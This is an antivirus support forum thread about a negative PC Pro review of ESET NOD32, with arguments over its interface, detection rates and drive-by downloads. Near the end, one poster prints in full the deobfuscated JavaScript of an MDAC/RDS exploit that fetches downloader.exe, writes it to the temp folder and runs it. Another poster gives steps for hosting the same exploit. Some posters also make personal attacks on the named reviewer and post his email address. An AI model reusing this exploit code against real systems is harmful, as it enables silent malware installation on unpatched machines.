There is an awful review of NOD in the latest issue of PC Pro :'(

It won't hit the streets for a few days yet (I'm a subscriber) but it won't do UK sales any good at all. The idiot journalist was insulting in his opening sentence and didn't improve much after that.

I'm at work now so I can't give details at the moment. I'll and try and elucidate tonight.

I would appreciate if you could post some parts of the review later, Id quite like to read what they had to say.

-{ Quote: "I would appreciate if you could post some parts of the review later, Id quite like to read what they had to say." }-

Here's what PC Pro UK online says in their review earlier this year http://www.pcpro.co.uk/shopper-labs/105201/eset-nod32-27.html?searchString=eset

I have read much, much worse:

"We always get a sense of deja vu when testing NOD32. The unusual interface of past versions remains and it won't appeal to everyone, but that's certainly not the most important factor when choosing an anti-virus program. The version we tested was for Windows 2000, XP and Vista; there is also a version for older operating systems from Windows 95 up to Me. You can even get a version for MS-DOS.

The program uses a modular approach, with different windows available to change settings for the email, document, real-time and on-demand scanners. It supports scheduled scans and there are tons of settings to play with. This will be of more interest to serious hobbyists than regular users who just want to install a program and leave it to run in the background.

The ability to create and switch between profiles is a nice touch. This lets you make changes to settings and apply them quickly and easily. You could load strict settings for times when you believe your PC is most at risk and choose a more relaxed profile when the emergency is over.

The last time we tested NOD32, it impressed us with its accuracy and, in our latest and most comprehensive tests, it holds on to its position as one of the front-runners. It detected 76 per cent of the email viruses and 46 per cent of the web-based threats. This means that its email virus detection is in the top five, just beating the Norton and McAfee products. It is also one of the better programs for detecting spyware and similar files, and is just beaten by Kaspersky and Steganos. NOD32's results are virtually identical to those of F-Secure Anti-Virus, which costs £5 more. NOD32 put less strain on our test system than F-Secure's product did.

NOD32 is a serious contender to win this anti-virus group test. However, we cannot ignore the fact that Steganos not only detects more email viruses but costs significantly less to buy and renew."

Hm, maybe someone else doesn't like the look of NOD32 v2. As for detection, there should be no complaints because the results are constantly getting better and better.

-{ Quote: "Hm, maybe someone else doesn't like the look of NOD32 v2. As for detection, there should be no complaints because the results are constantly getting better and better." }-

How about the look of NOD32 V3.0? :D

By the way, when will it be launched. ;D

Thanks for the post Howard, i tried to find a NOD review on their site but it appears it escaped me ;) I wonder what the review that nonmirecordo posts will be like ???

Magazine reviews do not really concern me that much, though, I use whatever I like to use. And right now, I like NOD32 :thumb:

I'm still at work but from memory that previous review bears no relation to the latest one.

Again, from memory, detection was in the low 70s% and the overall rating was 2 stars out of, I think, 6.

Kaspersky was first, Avira second (!).

Tests can never show an AV in its true colours. It is very possible to create a test set that NOD will detect 0% of, or indeed any AV solution would detect 0% of. I dont care much for reviews, they serve only to give me that warm fuzzy feeling when they agree on how awesome NOD is ;)

I certainly hope im not turning into one of those "fanboy" characters :P

Ok, here's the full review:

-{ Quote: "
Eset Nod32

An eccentric package that gives only average protection.

(pricing/supplier info. follows)

NOD32 means On-Demand Monitor. Confused? Get used to it. While most antivirus products talk about email protection or on-access file scanning, the main NOD32 configuration interface helpfully divides the program's modules up into AMON, DMON, EMON, IMON, and, oddly, NOD32.

The sense of bewilderment this inspires is characteristic of the NOD32 experience. Try to configure and use the software and you'll run into tickboxes that can't be unticked, alerts that appear underneath the active window, and requesters that give you the surprising option of copying malware into quarantine. It even disinfects email in a weird way, making Outlook Express think deleted attachments are still there.

The package does have some positives: CPU and RAM usage are reatively light, and if an email is found to be infected NOD32 intelligently puts the details of the infection right into the subject line for maximum visibility. There's also the sensible option to suppress alerts for a specified period of time, which strikes a great balance between flexibility and security.

At the actual task of finding viruses, however, NOD32 placed in the lower half of the table wirh an overall score of 77%. It made a decent fist of identifying the most common threats, but overlooked a variant of the Spam Tool trojan, which was spotted by every other package.

With its middling antivirus performance and unprofessional user interface, NOD32 fails to impress - even though it's been around for a long time. At this price, it certainly can't compete." }-
(not spell-checked)

The author of this un-grammatical, inaccurate and sarcastic piece is called Darien Graham-Smith (and judging by his photo, his name suits him). He can be contacted at darien@pcpro.co.uk.

Will someone else please point out to him the error of his ways; if I do, I might end up in court!

Coincidently, I cancelled my subscription to PC Pro last week. Now I know I made the right decision.

Bloody hell... someone has a gripe with Eset! The thing is, I have never seen anyone else complain about the things the author complains about... To me, absolute twaddle... but I think that his review may hurt Eset's sales in the UK.

-{ Quote: "With its middling antivirus performance and unprofessional user interface" }-

If he calls the current interface unprofessional , I don't know how professional some interfaces look when they only say "Secured" or "You are protected" , giving the user false sense of security and almost nothing can be changed/configured to opt everyone's different necessities

-{ Quote: "If he calls the current interface unprofessional , I don't know how professional some interfaces look when they only say "Secured" or "You are protected" , giving the user false sense of security and almost nothing can be changed/configured to opt everyone's different necessities" }-

I have to agree with you there... I fail to see the point of things like that in the interface, and if anything it can make the product appear slightly "garish" and over-confident. I like the way NOD tells me exactly what i need to know, when i need to know it :)

even though this is only a magazine review, PC Pro is probably the most read PC magazine in the UK, at least by IT professionals....or at least that's my guess....so even if the actual testing may not have been up to much, it certainly is a shame that NOD32 will be dismissed as a non-starter by people who havent heard of it before.

also a shame that this review comes just short of the release of version 3, which surely would have kept them happy as far as GUI goes.

-{ Quote: "Hm, maybe someone else doesn't like the look of NOD32 v2. As for detection, there should be no complaints because the results are constantly getting better and better." }-
I suggest you to take a second look at av-comparatives.org and av-test.org test results. ;) The heuristics are indeed strong and stronger in each test but the overall results are worse. :)

-{ Quote: "Hm, maybe someone else doesn't like the look of NOD32 v2. As for detection, there should be no complaints because the results are constantly getting better and better." }-

Honestly i don't know what have people so much against v2 interface.
Personally it's far better visually and to navigate than the new one from Smart Security Suite which has again huge buttons and status info and terribly cluttered settings. Thats why i like avast!'s, NOD32 and KAV6 settings. You first select an AV module (main on-access scanner, email scanner, HTTP scanner) and then select it's options. Thats much better than all the stuff cluttered under one settings menu. I'm an expert when it comes to such stuff, yet i still don't like it. Also detection windows in v2 is very cool with those animated squares moving and stuff.

-{ Quote: "Honestly i don't know what have people so much against v2 interface.
Personally it's far better visually and to navigate than the new one from Smart Security Suite which has again huge buttons and status info and terribly cluttered settings." }-

Agreed. I much prefer the current v2 interface over ESS interface.

Nod's interface and settings are the best, detection is not as great as fanboys make it seem and you guys should definetly mail that guy.

How can such a nub write reviews for a it magazine ???

Why let this "review"(I use the term review lightly in regard to this one!)bother you?does it make you feel unprotected or less protected having read it or do you feel the review is a waste of space?:-if its the latter just ignore it!
Don't even consider emailing the reviewer,it will make him feel as if people are taking notice of the crap he writes!

I've just remembered that one of the very knowledgeable columnists on PC Pro, Davey Winder, who uses the strap line 'IT Security Journalist of the Year', mentioned a few issues back that he uses NOD32!

Still, what does he know? ;)

Well, the review shows just the kind of malware and av knowledge you would expect from somebody who acquired his Ph.D. by contextualising Victorian literature: http://en.wikipedia.org/wiki/Darien_Graham-Smith

Dear me! And a thespian to boot.

Pun not intended.

-{ Quote: " but I think that his review may hurt Eset's sales in the UK." }-
-{ Quote: " even though this is only a magazine review, PC Pro is probably the most read PC magazine in the UK, at least by IT professionals." }-
I doubt whether sales will be affected here by this one article and IT professionals tend to take these reviews with a pinch of salt (and most of the ones I know do not use any AV!).

On the PC magazine front in the UK, Eset has adverts in most of the main ones, particularly the Gaming magazines and I have seen it now in a number of public libraries in the UK, even here in the backwoods of Dorset. So my guess is that Eset have significantly improved sales here in the UK of late and this one article is not going to affect that.

The article is right about some things.

The labels for the different modules are anything but intuitive. Even for advanced users it is not obvious what they mean without looking it up somewhere. Although a simple change in name could bring clarity into the matter this hasn't been done in all those years. If you want to be more than just a product for geeks you should adress this issue (like in current ESS beta).

I don't know how they tested detection in this magazine, but latest AV-comparatives and AV-test revealed that Nod is not on top currently. So I think this is a valid point, too. (Which doesn't mean it is generally a bad product).

Just have a look at the guy here: http://en.wikipedia.org/wiki/Darien_Graham-Smith

He has NO creditability in security software testing. NONE. How can you put someone like this guy on a position to write security software reviews? That's ridiculous.

Oh, how I love the way NOD32 fans launch into ad-hominem attack mode whenever someone has the unmitigated gall to criticize NOD32, while giving tacit or direct approval to any positive review!

The people who contradicted Graham-Smith's opinions by addressing them (rather than by going after Graham-Smith himself) have my respect, even though I tend to disagree with them.

-{ Quote: "I have to agree with you there... I fail to see the point of things like that in the interface, and if anything it can make the product appear slightly "garish" and over-confident. I like the way NOD tells me exactly what i need to know, when i need to know it :)" }-

the whole point of big large buttons - like "Protection ON" and "Secured" are to keep the masses who have no idea about the internal workings of a complex software system like an antivirus from thinking... they don't WANT to know the ins and outs of how they are protected (for the vast majority) - that's a reality. You and I are NOT in the majority in wanting finite control over our own protection system. You and I are "power users" - and those kinds of dumbed down interfaces are what the majority of the world wants/needs to NOT be overwhelmed by the thought process of trying to understand what an antithreat solution must actually accomplish.

Pure and simple... simple interfaces are what the unwashed masses want... ESS's new interface goes a LONG way to help there.

-{ Quote: "Just have a look at the guy here: http://en.wikipedia.org/wiki/Darien_Graham-Smith

He has NO creditability in security software testing. NONE. How can you put someone like this guy on a position to write security software reviews? That's ridiculous." }-

Come on... you know how the world at large works... publishing is no different...

it's not what you know in general that gets you into a position of trust and "power" - it's WHO you know... he probably want to Cambridge with someone higher up in the magazine's hierarchy - that's all the qualification it takes to become an "expert" in the eyes of your compadres... it's not a question of being a "real" expert! ;)

-{ Quote: "Hm, maybe someone else doesn't like the look of NOD32 v2. As for detection, there should be no complaints because the results are constantly getting better and better." }-

Actually NOD32 is not very good at generically detecting drive-by downloads that have been obfuscated by JavaScript. I say generically, because one can easily and constantly writing string-based signatures for each version of obfuscation out there. But if a new one comes out, the signature is useless. Kaspersky has some level of JScript interpreter so it can deobfuscate some obfuscation algorithms but as soon as you use math functions in the obfuscation Kaspersky is screwed. Is NOD32 even that good ? I dont know. NIS2008 Beta is the only product I have tested so far that can generically detect drive-by downloads no matter what kind of obfuscation is used.

So overall, at least in this area, NOD is falling behind.

All AVs should start to include a JavaScript interpreter.

if the AMON module finds the threat, why try and keep up with an ever moving target of obfusticating downloader code?

As I understand it, IMON is going to be axed - so as long as AMON grabs the malware, I don't care if it actually gets onto my machine - I ONLY care that it is grabbed before it can execute and do any harm.

-{ Quote: "As I understand it, IMON is going to be axed..." }-

And replaced with a new HTTP scanner.

-{ Quote: "All AVs should start to include a JavaScript interpreter." }-

That is not going to work just because of the scope of the APIs that would have to be implemented. Security vendors could spend years implemented such an interpreter and during that time the bad guys will continue to find JScript APIs that are not interpreted and will bypass the protection.


I have attached a file that contains obfuscated HTML for the MDAC attack. Rename it to an html and host it on a web server. Copy a file called downloader.exe into the same directory as the html on the webserver. Browse to this web page using an unpatched XP SP2 machine running ESS or NOD32 2.7. The downloader.exe will run, proving that NOD has zero protection against drive-by downloads.

Btw.. the obfuscated HTML was created using a tool I created. It will create a completely random unique HTML everytime I run it. No, I will not release the tool for obvious reasons. NOD 2.7 and ESS are completely useless at detecting this, so is Kaspersky 7. NIS 2008 Beta can, but the older versions can't. Strange.

-{ Quote: "if the AMON module finds the threat, why try and keep up with an ever moving target of obfusticating downloader code?

As I understand it, IMON is going to be axed - so as long as AMON grabs the malware, I don't care if it actually gets onto my machine - I ONLY care that it is grabbed before it can execute and do any harm." }-

:-) AMON does not detect the malware, because the malware is constantly changing, just like the obfuscated JScript. There are many examples of live websites today that generate a new malware executable everytime you visit that URL and these executables are not detected by NOD.

Remember that there are 4 pieces here: the vulnerability (which doesn't change), the JScript that implements the vulnerablity (this is constantly being obfuscated and changed), the downloader.exe (constantly changing) and the malware that the downloader downloads (against constantly changing). The only way to provide proactive protection is to generically detect the vulnerability. All other methods are reactive.

-{ Quote: "And replaced with a new HTTP scanner." }-

Why are they changing the HTTP Scanner ?

-{ Quote: "Why are they changing the HTTP Scanner ?" }-

I actually have no idea :P

Im not sure how the new scanner will work... although I think I read somewhere that the winsock level scanner will be replaced with an NDIS filter... im not sure so dont quote me on it. ;)

-{ Quote: "All other methods are reactive." }-

get used to it - Antivirus is reactive because of the porous operating system you CHOOSE to use.

-{ Quote: "get used to it - Antivirus is reactive because of the porous operating system you CHOOSE to use." }-

No actually I dont get used to it - I just switch over to products that have better proactive protection. For example, today 15th July 2007, here is a website which if you visit it, the machine will be infected with a completely updated NOD 2.7 or ESS. [url removed - no links to active malware allowed - Blue]


Btw.. which OS do you use ?

-{ Quote: "Why are they changing the HTTP Scanner ?" }-

Because of its current nature . IMON works in the Winsock level . Unfortunately too many programs touch there and could possibly damage the Winsock and stop the network connection . IMON requires "clean" ;D Winsock to work well :thumb:

-{ Quote: "Btw.. which OS do you use ?" }-

My operating systems of choice are not always MY choice, but chosen instead because of applications I either MUST, or would prefer to have an option to run... so a run-down of my computers, current and past begins...

At the moment...

in the office I run windows xp pro on all my machines except a test server running CentOS, at home I have a windows gaming machine with XP Pro. I also have an intel macbook with dualboot, MacOS 10 Tiger and Win XP pro partition with NOD32 on it (for work related issues I have to vpn/remote desktop to work and MacOS won't do that with our current vpn).... for working servers, I run a cluster of a dozen various unix flavors (I have 20+ years unix admin experience) - some Trustix, some CentOS and the new mailservers I'm currently speccing to build will be BSD flavored - Dual QuadCore beasts. I use whatever operating system best fits the job with the knowledge at hand... and I adapt... like I'll be upgrading the vpn at the office so that I don't HAVE to use windows XP to vpn in!

Previous incarnations of personal machine have ranged from xp, win2k, redhat, win 98, win 95, win 3.1, macos 7 + 8, and a whole hosts of machines I learned on prior to work such as Amstrads (both a PCW (http://en.wikipedia.org/wiki/Amstrad_PCW) and CPC (http://en.wikipedia.org/wiki/Amstrad_CPC)) Commodores Amiga (http://en.wikipedia.org/wiki/Commodore_Amiga) and C64 (http://en.wikipedia.org/wiki/Commodore_64) before that and even a Sinclair Spectrum 48k (http://en.wikipedia.org/wiki/Sinclair_Spectrum)...

I am, if nothing, aware of my choices - and take appropriate hardening actions for said machines...

-{ Quote: "My operating systems of choice are not always MY choice, but chosen instead because of applications I either MUST, or would prefer to have an option to run... so a run-down of my computers, current and past begins...

At the moment...

in the office I run windows xp pro on all my machines except a test server running CentOS, at home I have a windows gaming machine with XP Pro. I also have an intel macbook with dualboot, MacOS 10 Tiger and Win XP pro partition with NOD32 on it (for work related issues I have to vpn/remote desktop to work and MacOS won't do that with our current vpn).... for working servers, I run a cluster of a dozen various unix flavors (I have 20+ years unix admin experience) - some Trustix, some CentOS and the new mailservers I'm currently speccing to build will be BSD flavored - Dual QuadCore beasts. I use whatever operating system best fits the job with the knowledge at hand... and I adapt... like I'll be upgrading the vpn at the office so that I don't HAVE to use windows XP to vpn in!

Previous incarnations of personal machine have ranged from xp, win2k, redhat, win 98, win 95, win 3.1, macos 7 + 8, and a whole hosts of machines I learned on prior to work such as Amstrads (both a PCW (http://en.wikipedia.org/wiki/Amstrad_PCW) and CPC (http://en.wikipedia.org/wiki/Amstrad_CPC)) Commodores Amiga (http://en.wikipedia.org/wiki/Commodore_Amiga) and C64 (http://en.wikipedia.org/wiki/Commodore_64) before that and even a Sinclair Spectrum 48k (http://en.wikipedia.org/wiki/Sinclair_Spectrum)...

I am, if nothing, aware of my choices - and take appropriate hardening actions for said machines..." }-

Hehe, I feel like such a "n00b" ::):P

How come there are so many fanboys of NOD32? Its just an AV product. Why get angry about peopole not liking the product?

-{ Quote: "Honestly i don't know what have people so much against v2 interface.
Personally it's far better visually and to navigate than the new one from Smart Security Suite which has again huge buttons and status info and terribly cluttered settings. Thats why i like avast!'s, NOD32 and KAV6 settings. You first select an AV module (main on-access scanner, email scanner, HTTP scanner) and then select it's options. Thats much better than all the stuff cluttered under one settings menu. I'm an expert when it comes to such stuff, yet i still don't like it. Also detection windows in v2 is very cool with those animated squares moving and stuff." }-

Couldn't agree more. I too like the interface of KAV & Nod32, maybe I'm just oldschool? Everything is where I want it to be. People that can't figure it out probably don't belong anywhere near a computer in the first place, it really is not rocket science.

Most peoples idea of a good interface nowadays is for it to say "You Are Protected" in big green letters, giving one a false sense of security. That kind of stuff doesn't impress me. I don't care how pretty it looks... just shut up and do your job and we'll get along just fine.

Also I've been a very satisfied Nod32 v2.7 user for months now, and combined with common sense and safe browsing habits nothing has penetrated it. Once in awhile I go to other sites to do scans to see if it missed anything. It never does. I just can't fathom that the next AV is any better detection wise, but the tests show otherwise.

I have no plans to switch anytime soon, regardless of articles such as this.

-{ Quote: "How come there are so many fanboys of NOD32? Its just an AV product. Why get angry about peopole not liking the product?" }-

Hi mykemyk,

This is the official Nod32 support forum; some of the posters will take a poor review personally... just like posters on other official AV forums do when a less than stellar review is published about "their" AV :P

If you want to see the real "fanboys" go at it, please read some test results threads in the other AV software forum...that's when they all come out of the woodwork ;D...

Cheers.

you got that right cus.::)

-{ Quote: "Here's what PC Pro UK online says in their review earlier this year http://www.pcpro.co.uk/shopper-labs/105201/eset-nod32-27.html?searchString=eset

...

The ability to create and switch between profiles is a nice touch. This lets you make changes to settings and apply them quickly and easily. You could load strict settings for times when you believe your PC is most at risk and choose a more relaxed profile when the emergency is over

...." }-
I'm nost really sure that they were using NOD32 when they discovered this new profile feature....
I realise that the on-demand scanner has this feature but I'm not sure how that relates to real time operations...
-{ Quote: "Ok, here's the full review:


(not spell-checked)

The author of this un-grammatical, inaccurate and sarcastic piece is called Darien Graham-Smith (and judging by his photo, his name suits him). He can be contacted at darien@pcpro.co.uk.

Will someone else please point out to him the error of his ways; if I do, I might end up in court!

Coincidently, I cancelled my subscription to PC Pro last week. Now I know I made the right decision." }-The writer has acheived his purposes I think - he has filled his word quota, related his experience and perception, and the results of his testing and at the same time has created discussion of his article, driven traffic to the web site and probably sold more magazines.

Whether or not this person was qualified to do any of these things I do not know but it does not matter - If four people were reviewing oranges and one likes oranges, one really really likes oranges, one dislikes oranges and one really really dislikes oranges, what sort of reports do you think that they would write?

Cheers :)

-{ Quote: "even though this is only a magazine review, PC Pro is probably the most read PC magazine in the UK, at least by IT professionals....or at least that's my guess....so even if the actual testing may not have been up to much, it certainly is a shame that NOD32 will be dismissed as a non-starter by people who havent heard of it before.

also a shame that this review comes just short of the release of version 3, which surely would have kept them happy as far as GUI goes." }-
We've been waiting for version 3 now for a year. Its a shame that Eset is taking so long to finish it.

I don't like the current interface with all these modules either and I suspect neither does Eset, a major reason version 3 is coming out. So the reviewers criticism is valid.

My licenses will run out in three weeks. Since version 3 is not ready, I'll be trying out Kasperski, F-Secure and last if out of beta NOD version 3 before I pay for new subscriptions.

-{ Quote: "How come there are so many fanboys of NOD32? Its just an AV product. Why get angry about peopole not liking the product?" }-

True, it is a product but there is also another side here:

AV-testing has been under spotlight for a while, the methods and ranked results are becoming nothing but a mockery. In some cases the lowest ranked product by some ‘independent AV tester will outperform every other product in the same week of testing by another tester. Add insult to that by enduring the boast of some AV-gurus who always post on forums how they poke holes on the AV products.

I am not offended by Reviewers not liking a particular product (including NOD 32) but perhaps some users have come to take things too personal and worship products. Security is much more complex than performance of products. We all know the weakest link in security is the USER. I hope that no AV vendor will feel financial pressure and get tempted to over-hype the effectiveness of his/her product by misleading adverts or reviews/awards. 8)

-{ Quote: "We've been waiting for version 3 now for a year. Its a shame that Eset is taking so long to finish it" }-

Well , with all my best regards , this is not true . Let me explain why.
First , ESET is excellent but small company . Keep in mind that they are good but small team - they don't have the same resourses and manpower like Microsoft/Symantec/McAfee ... but they are still top . Because of this reason they act slowly and carefully and even though it is slow step up , it is good step up .

ESET are small team but they responde to all users want - they make new Linux products , they make Online Scanner , they do support NOD32 v2 , they create new Suit , they made Mobile AV ...

You can't compare the manpower of ESET to that of Microsoft or to that of Symantec , but still ESET are top player when it comes to quality .

When talking about quality , I am not sure if any of you have noticed but ESET are company with real quality control . ESET will never push software which is ~unstable~ and which can make a real computer-quake (earthquake) , which can bring any machine to an complete data loss and complete no-boot . Not so many resourses but they act slowly and qualitive . I am sure we can all call some vendors' names which play games , every new year = new suit (2005-new suit , 2006-new suit , 2007-new suit , 2H of 2007 - new suit =2008 , I am sure they'll have new product 2009 ready in March 2008 ) . These vendors have no quality control no matter what some may tell . We have all seen it and those products are not stable and really working until their first or second big update . They publish earlier "new stuff" because these vendors have nothing else to offer and thus the new version is a combo of the Marketing dept and the Development dept. to make users pay some attention to them.

Even though we see the development of the new Eset products - we still have the old ones which are not worse (I mean the new ones are much better but the old one still work effectively) . Although I am not inside ESET I am 100% sure they will not push a new products for the mass-public unless it is completely ready

Regards! :thumb:

I am going to have to differ with you on that one. There is an old saying that you can put your profits in your pocket, or back into your company. Eset has done very well and they have earned it. But the small company reference you make doesnt hold water with me. Avira is a company of around about 250 folks and they do seem to get it right. It is all in where you lay your priorities as a company.

-{ Quote: "...
I have attached a file that contains obfuscated HTML for the MDAC attack. Rename it to an html and host it on a web server. Copy a file called downloader.exe into the same directory as the html on the webserver.
..." }-It may be obfuscated but it's not hard to decipher:
functionCreateO(o, n) {
varr = null;

try{eval('r = o.CreateObject(n)') }catch(e){}

if (!r) {
try{eval('r = o.CreateObject(n, "")') }catch(e){}
}

if (!r) {
try{eval('r = o.CreateObject(n, "", "")') }catch(e){}
}

if (!r) {
try{eval('r = o.GetObject("", n)') }catch(e){}
}

if (!r) {
try{eval('r = o.GetObject(n, "")') }catch(e){}
}

if (!r) {
try{eval('r = o.GetObject(n)') }catch(e){}
}

return(r);
}


functionGo(a) {
vars = CreateO(a, "WScript.Shell");
varo = CreateO(a, "ADODB.Stream");
vare = s.Environment("Process");

// form the path to the actual downloader.exe

varurl = document.location.toString ();
varnum = url.lastIndexOf ("/"); // find the last slash
url = url.substring (0, num);
url = url+ "/downloader.exe";

varxml = null;
varbin = e.Item("TEMP") + "downloader.exe";
vardat;

try{xml=newXMLHttpRequest(); }
catch(e) {
try{xml = newActiveXObject("Microsoft.XMLHTTP"); }
catch(e) {
xml = newActiveXObject("MSXML2.ServerXMLHTTP");
}
}

if (!xml) return(0);

xml.open("GET", url, false);
xml.send(null);
dat = xml.responseBody;

o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(dat);
o.SaveToFile(bin, 2);

s.Run(bin,0);
}

functionExploit() {
vari = 0;
// RDS Data control RDS Data Control Business object factory
vart = newArray('{BD96C556-65A3-11D0-983A-00C04FC29E36}',/*'{BD96C556-65A3-11D0-983A-00C04FC29E36}',*/'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);

while (t[i]) {
vara = null;

if (t[i].substring(0,1) == '{') {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" +t[i].substring(1, t[i].length - 1));
}else{
try{a = newActiveXObject(t[i]); }catch(e){}
}

if (a) {
try{
varb = CreateO(a, "WScript.Shell");
if (b) {

Go(a);
return(0);
}
}catch(e){}
}
i++;
}

}

Exploit();And usually it's a tip off when there are more than three prompts for activeX etc...
192556
192557
192558
Hardly what I'd call a drive-by download when it requires user permission...

Cheers :)

edit: Sorry, you said 'unpatched' SP2 didn't you...
What does this have to do with UK's PC Pro Review anyway? I must have missed something...

-{ Quote: "How come there are so many fanboys of NOD32? Its just an AV product. Why get angry about peopole not liking the product?" }-

;D I see what you mean.

I mean look, Nod is still a capable product. But it's aged awefully as compared to products like Kaspersky's Antivirus V7 or even Norton's Antivirus (by the way I'm playing with Crockett at the moment and it's light, fast and while not quite to my liking as Kaspersky's Antivirus V7), is far more user friendly and intuitive than Nod.

I hope for Eset's sake and the future of their Antivirus' that they ship Nod Version 3. *puppy*

-{ Quote: "
I am sure we can all call some vendors' names which play games , every new year = new suit (2005-new suit , 2006-new suit , 2007-new suit , 2H of 2007 - new suit =2008 , I am sure they'll have new product 2009 ready in March 2008 ) . These vendors have no quality control no matter what some may tell . We have all seen it and those products are not stable and really working until their first or second big update . They publish earlier "new stuff" because these vendors have nothing else to offer and thus the new version is a combo of the Marketing dept and the Development dept. to make users pay some attention to them.:" }-

Maybe it's time for Eset to manage their growth better then. :ouch:

Kaspersky's Lab isn't as big as Microsoft and Symantec and they update their flagship products yearly and the quality is exceptional! *puppy* :-*

-{ Quote: "if the AMON module finds the threat, why try and keep up with an ever moving target of obfusticating downloader code?

As I understand it, IMON is going to be axed - so as long as AMON grabs the malware, I don't care if it actually gets onto my machine - I ONLY care that it is grabbed before it can execute and do any harm." }-

Actually I care very much that malware does *not* get to my hard drive. I would much prefer that Eset concentrated on this side of their product and included archive detection as well as HTTP detection rather than relying on AMON to catch stuff as they exectute; which to my mind is too late.

-{ Quote: "Actually I care very much that malware does *not* get to my hard drive. I would much prefer that Eset concentrated on this side of their product and included archive detection as well as HTTP detection rather than relying on AMON to catch stuff as they exectute; which to my mind is too late." }-

My thoughts exactly.

Is there a way I can donate my license of Nod? I'm not using it and don't plan to continue using it. :dry: *puppy*

criticism is good & no need to shout down the reviewer.

he cannot make nod32, a poor product, try whatever he may, but it does help to improve the product, even, for those whose opinion may seem weird.

to me the GUI is not a problem at all, but it could do with minor improvements. however my wish is that, better GUI or not, nod32 should never compromise on the basic strengths, speed & accuracy,.